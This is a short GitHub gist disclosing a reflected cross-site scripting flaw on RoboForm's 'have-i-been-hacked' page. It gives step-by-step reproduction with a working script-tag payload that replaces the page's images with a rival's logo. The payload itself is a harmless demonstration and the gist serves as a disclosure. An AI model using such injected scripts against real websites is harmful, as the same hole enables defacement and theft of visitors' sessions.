Skip to content

Instantly share code, notes, and snippets.

@AlekseyKorzun
Last active March 19, 2017 00:53
Show Gist options
  • Save AlekseyKorzun/f2bca06f74257cfae288 to your computer and use it in GitHub Desktop.
Save AlekseyKorzun/f2bca06f74257cfae288 to your computer and use it in GitHub Desktop.
Roboform XSS
Credit to Paul Moore / @Paul_Reviews:
1. Navigate to http://www.roboform.com/have-i-been-hacked
2. Replace 'Enter account to test' with following: <script type="text/javascript">$('img').attr('src', 'https://lastpass.com/images/lastpass-logo.png');</script>
3. Click on 'Check Now'
In action:
http://g.recordit.co/oBk26XEv0P.gif
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment